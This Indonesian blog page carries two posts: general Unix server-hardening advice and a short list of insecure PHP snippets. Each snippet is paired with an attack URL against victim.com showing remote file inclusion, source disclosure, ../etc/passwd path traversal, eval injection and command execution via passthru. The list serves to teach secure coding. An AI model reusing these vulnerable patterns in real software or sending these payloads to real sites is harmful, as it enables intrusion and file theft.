Pada bagian software, kita bisa menggunakan sistem operasi dan software-software yang telah dikenal kehandalannya. Hal ini bertujuan supaya sistem operasi maupun software yang kita gunakan mampu menahan gempuran atau serangan dari Internet dan tidak sampai merusak hardware. Selain itu, sebaiknya kita selalu menggunakan software-software keluaran terbaru. Untuk itu, kita harus lebih sering memantau perkembangan software yang kita gunakan tersebut.

Setelah kita memilih sistem operasi dan software yang akan digunakan, kita harus mengkonfigurasi sistem operasi dan software tersebut agar tidak memiliki celah yang bisa dieksplorasi oleh para penyusup dari Internet. Apabila kita tidak waspada, hole-hole yang sudah umum pun bisa muncul pada sistem jaringan komputer kita. Berikut adalah terdapat beberapa titik penting pada sistem operasi berbasis Unix yang perlu mendapat perhatian.

Perintah-perintah berawalan huruf "r"

Perintah-perintah berawalan huruf "r" (rlogin, rsh, rwho, dlsb) perlu ditinjau ulang dari segi kebutuhan. Apabila kita tidak memerlukan fungsi-fungsi perintah di atas, matikan saja. Jika memang memerlukannya, kita harus lebih hati-hati dalam mengkonfigurasi file-file yang berhubungan dengan setting perintah tersebut. Untuk perintah-perintah tersebut, file konfigurasi yang penting adalah /etc/hosts.equiv.

File-file dengan suid

File dengan konfigurasi suid adalah file (umumnya berupa program) yang apabila dieksekusi akan memiliki hak setingkat dengan pemilik (owner) dari file tersebut. Sebagai contoh, perintah "chpass" termasuk jenis file suid. Perintah "chpass" ini berguna untuk mengubah data-data tentang user seperti: nama lengkap, alamat kantor, alamat rumah, dsb. Pada dasarnya, perintah "chpass" melakukan perubahan pada file yang berisi user password dari komputer tersebut. Oleh karena itu, perintah tersebut memerlukan konfigurasi suid root karena file yang berisi user password hanya bisa diubah oleh root sendiri atau memiliki hak akses setara dengan root.

File-file dengan suid root harus dibatasi jumlahnya sesuai kebutuhan. Bila tidak, para penyusup bisa memanfaatkan kelemahan ini untuk memperoleh hak akses setara root pula. Seringkali para penyusup menyiapkan backdoor melalui file-file suid tersebut sehingga saat penyusup ingin kembali masuk ke dalam sistem, ia bisa menggunakan backdoor tersebut. Salah satu langkah penanggulangannya adalah dengan membuat daftar file suid di saat setelah konfigurasi sistem operasi selesai dan melakukan pemeriksaan secara rutin yang kemudian dibandingkan dengan daftar file pertama.

File & directory permission

Pada saat mengkonfigurasi sistem operasi, file permission dan directory permission sebaiknya ikut dikonfigurasi lebih lanjut selain konfigurasi awal yang telah disediakan dari pencipta sistem operasi tersebut. Batasi user hanya untuk bisa memiliki akses penuh pada home directory user tersebut.

Network File System (NFS)

NFS memungkinkan kita membuat file system yang berada di komputer lain seolah-olah berada di komputer kita. Tetapi, apabila kita kurang hati-hati dalam mengkonfigurasinya, hal ini menjadi makanan empuk bagi para perusak. Kita harus memilih direktori mana saja yang perlu dibuat menjadi terbuka terhadap komputer lain. Hak akses juga harus menjadi perhatian sehingga kita dapat menempatkan file-file pada porsi yang sebenarnya. Perbaikan-perbaikan (patches) untuk NFS juga telah tersedia di Internet karena NFS memiliki beberapa titik kelemahan.

majordomo

Majordomo adalah salah satu software yang menangani mailing list dan sudah tersebar sangat luas. Gunakan selalu majordomo versi di atas 1.91 karena versi di bawah 1.91 memiliki bugs yang cukup berbahaya.

Fingerd

Utilitas ini sudah cukup terkenal sebagai salah satu alat utama dalam Internet worm yang sempat melumpuhkan jaringan Internet di tahun 1988. Hingga saat ini, utiliti finger masih sering digunakan sebagai langkah awal memantau sistem yang akan disusupi. Meskipun perbaikan-perbaikan terhadap bug yang ada di fingerd telah dilakukan, sebaiknya layanan ini ditutup untuk akses dari luar sehingga perintah finger hanya bisa dilakukan sebatas sistem atau komputer itu.

File /etc/inetd.conf

File /etc/inetd.conf ini berisi konfigurasi service-service yang dijalankan oleh inetd. Sebaiknya file ini diatur pada mode 600 dan dimiliki oleh root. Selain itu, sebaiknya kita menutup layanan-layanan networking yang tidak kita perlukan. Konfigurasi awal dari instalasi sistem operasi seringkali membuka layanan-layanan networking yang tidak kita butuhkan.

Anonymous FTP

Anonymous FTP disediakan bagi user umum untuk mendapatkan file-file yang kita publikasikan. Hal yang perlu diperhatikan dari sudut pandang sekuriti adalah konfigurasi hak akses yang diberikan pada direktori-direktori yang kita publikasikan. Selain itu, selalu gunakan versi terbaru untuk FTP daemon yang kita gunakan. Versi FTP daemon yang sudah lama memiliki perintah-perintah jarak jauh untuk meletakkan file ataupun membaca file yang berada di direktori selain direktori FTP tersebut.

SMTP Server

SMTP server adalah server yang bertugas mengatur pengantaran electronic mail dari pengirim ke penerima. SMTP server yang sering digunakan adalah sendmail. Sendmail ini telah terkenal kehandalannya tetapi juga memiliki bugs yang bisa digunakan untuk mendapatkan hak akses setara root. Untuk meminimalkan risiko ini, selalu gunakan versi terbaru dari sendmail. Kita juga bisa menaikkan tingkat proses logging sampai tingkat/level 9. Pada tingkat tersebut, sendmail logger akan mendeteksi usaha-usaha eksploitasi terhadap kelemahan sendmail.

HTTP Server / Web Server

Baru-baru ini, Web server merupakan salah satu titik eksploitasi yang paling terkenal. Dengan mengeksploitasi bugs yang ada di web server ini, para penyusup bisa mendapatkan hak akses setara root. Hal ini mengakibatkan data-data home page yang ada di web server itu diacak-acak dan diganti sesuka hati penyusupnya. Untuk mencegah terjadinya hal ini, ambil beberapa langkah pencegahan berikut: Gunakan selalu HTTP daemon yang terbaru dan telah diketahui belum memiliki bugs. Contoh: NCSA httpd versi 1.5.

Hilangkan script-script yang tidak perlu yang memerlukan akses ke sistem file. Umumnya, script-script tersebut disebut dengan Common Gateway Interface (CGI) script. Lakukan konfigurasi sebaik-baiknya terhadap CGI script yang kita perlukan sebagai penghubung antara user dan server. Gunakan filter untuk mendeteksi input yang diberikan user, terutama terhadap karakter-karakter yang berpotensi untuk merusak seperti: \n \r ( . , / ; ~ ! ) > | ^ & $ ` < %.

Selain dari itu, kita bisa menggunakan software firewall untuk membatasi akses dan melakukan pemantauan terhadap aliran transfer data. Software firewall ada yang bersifat shareware dan komersial. Cara instalasi, penggunaan dan konfigurasinya tidak dibahas pada tulisan ini karena topik tersebut cukup luas

Dalam suatu sistem yang terproteksi cukup ketat, seringkali kita tidak bisa mengakses komputer kita dari jarak jauh. Untuk memenuhi kebutuhan tersebut tanpa harus mengorbankan tingkat sekuriti sistem, kita bisa menempuh dua cara. Cara pertama adalah mengubah program yang bertugas menerima akses langsung dari luar sehingga kita bisa memonitor, mencatat maupun membatasi akses yang diberikan. Contoh program yang menerima akses langsung dari Internet adalah telnetd. Cara kedua adalah menyiapkan hardware khusus yang bertindak sebagai perantara antara user dan komputer. Fungsi dari hardware khusus ini tidak berbeda jauh dengan software yang diubah pada cara pertama.

Bagian User

Jika sisi software telah dikonfigurasi dengan baik, sisi user perlu mendapat perhatian. Seringkali, user pada suatu sistem memilih password yang mudah ditebak, seperti "Komputer", "Memori", kombinasi nama user, nama perusahaan penghasil meja komputer, merek monitor/keyboard/casing komputer, dsb. Selain itu, jangan menuliskan password pada kertas atau benda apa pun. Tentunya sudah cukup banyak tip untuk membuat password yang baik. Jika dipandang perlu, konfigurasi password user bisa diatur agar user diharuskan memperbarui passwordnya secara periodik. Cara lain yang bisa dilakukan adalah menjalankan program yang berfungsi memecahkan kode password pada file password yang Anda miliki. Program semacam ini cukup banyak di Internet dan tersedia untuk berbagai platform sistem operasi. Pada sistem operasi Unix, program yang cukup terkenal adalah Crack. Dengan menggunakan program ini, kita dapat mengetahui apakah user telah memilih password dengan baik.

Langkah lain yang bisa kita lakukan adalah mencari dan mendapatkan software-software khusus yang berhubungan dengan masalah sekuriti. Contohnya: COPS (software penganalisa kelemahan dalam password dan konfigurasi file), SATAN (software penganalisa jarak jauh terhadap usaha-usaha penyusupan dari luar), TCP-Wrapper (software yang bertugas mencatat beberapa aktivitas transfer data), Tripwire (mirip dengan TCP-Wrapper), dsb. Dengan adanya software ini, kita bisa mengetahui seberapa tinggi tingkat sekuriti sistem jaringan komputer kita.

Penanggulangan

Jika terjadi usaha-usaha penyusupan ke dalam sistem jaringan komputer, kita harus secepat mungkin menutup akses dari mana usaha-usaha penyusupan tersebut. Beberapa ciri dasar dari usaha penyusupan adalah usaha login yang gagal terus-menerus, sumberdaya komputer yang terserap habis akibat satu atau lebih layanan networking, munculnya file-file aneh yang asal-usulnya tidak diketahui, dan jebolnya password dari beberapa user. Bila penyusup telah berhasil memasuki sistem komputer dan bisa memperoleh hak akses setara root, bisa dipastikan sistem komputer kita sudah tidak aman. Mengapa? Karena pada umumnya penyusup telah membuat backdoor yang cukup aman dan tersembunyi kecuali kita mengetahui setiap titik dari backdoor yang dibuat oleh penyusup tersebut dan kita bisa memusnahkannya. Bila kita tidak bisa menemukan backdoor tersebut, jalan teraman adalah instalasi ulang sistem operasi yang ada di komputer tersebut L.

Sebagai system administrator yang baik, kita seharusnya selalu membaca log file yang banyak dihasilkan oleh program-program yang dieksekusi di komputer kita. Dengan membaca log file, kejadian-kejadian yang tidak diinginkan dapat dideteksi lebih dini.

Akhir kata, "tiada gading yang tak retak". Kita harus selalu waspada dengan kesalahan-kesalahan yang mungkin kita buat baik dengan sengaja maupun tidak, yang secara langsung atau tidak langsung dapat mengancam sekuriti sistem jaringan komputer kita. Kita juga harus selalu meningkatkan tingkat keterampilan dan keahlian kita karena usaha-usaha eksplorasi yang dilakukan oleh para hacker, cracker dan phreaker selalu lebih maju.

Daftar Sumber Dokumen dan Situs di Internet yang berkaitan dengan masalah sekuriti di Internet

Dokumen:

Computer Security Basics, Deborah Russell & G.T. Gangemi Sr., © 1991 O'Reilly & Associates, Inc. Pratical Unix Security, Simon Garfinkel & Gene Spafford, © 1991 O'Reilly & Associates, Inc.

Labels:


On 2/25/09 at 12:27 PM


Kesalahan Fatal penulisan scripts php

Kesalahan Fatal penulisan scripts php

Beberapa kesalahan penulisan scripts php yang dapat berakibat fatal.

======
kasus 1
======
[scripts]
$page = $_GET[page];
include($page);

[attack]
http://victim.com/file.php?page=[evil scripts]

======
kasus 2
======
[scripts]
header( “Content-Type: application/octet-stream” );
header( “Content-Length: ” . filesize($_GET['file'] ) );
header( “Content-Disposition: inline; filename=\”$_GET[file]\”");
readfile($_GET['file'] );

[attack]
http://victim.com/file.php?file=index.php

=======
kasus 3
=======
[scripts]
$fp = fopen(”/path/{$_GET['filename']}.txt”, ‘r’);

[attack]
http://victim.com/file.php?filename=../../../etc/passwd

======
kasus 5
======
[scripts]
eval($_GET[ev]);

[attack]
http://victim.com/file.php?ev=include($_GET[irv]);&irv=[evil code]

==========
kasus 6
==========
[scripts]
passthru($_GET[cmd]);

[attack]
http://victim.com/file.php?cmd=ls -al

-----------------------------------------------------------------
penulisan script php akan berakibat fatal pada web site anda
maka dari itu tutupilah celah keamanan dengan menuliskan script php yang benar.
jika tidak, maka situs anda tidak akan luput dari serangan para defacer :)



Labels:


at 12:22 PM



My Profile:


Biography:

short story:

[ Friends Link ]

[ chat with me ]


[ archives ]

[ Notices ]

By title

Yahoo! Southeast Asia Open Hack Day 2009
HACKER IDOL ??
Kismet 2009 release !
macam" serangan hacker
CRACKER KEMBALI BOBOL BANK PERMATA
DDOS ANCAM NEGARA US DAN KOREA
Anti-sec movement kembali mengancam beberapa situs
IDSecconf 2009 Call For Paper
Di tuduh Fitnah Via Email, 6 Tahun dan denda 1 miliar menanti
Introduction to Load Balancing with HAPROXY
Hacker Malaysia Berunding Untuk Damai Dengan Hacker Indonesia
BACKTRACK 4 BETA SUDAH DI RILIS
AYO TANGKAP MEREKA !!!!
Meningkatkan Sekuriti Jaringan Komputer Anda
Kesalahan Fatal penulisan scripts php

By month

2002.03 2002.12 2005.12 2008.11 2009.02 2009.03 2009.04 2009.05 2009.06 2009.07 2009.08 2009.09 2009.10 2009.11 2009.12 2010.01 2010.03



 


elv1n4 Themes v2.0.0 © 2009 by elv1n4

www[dot]elv1n4.anti-sec[dot]org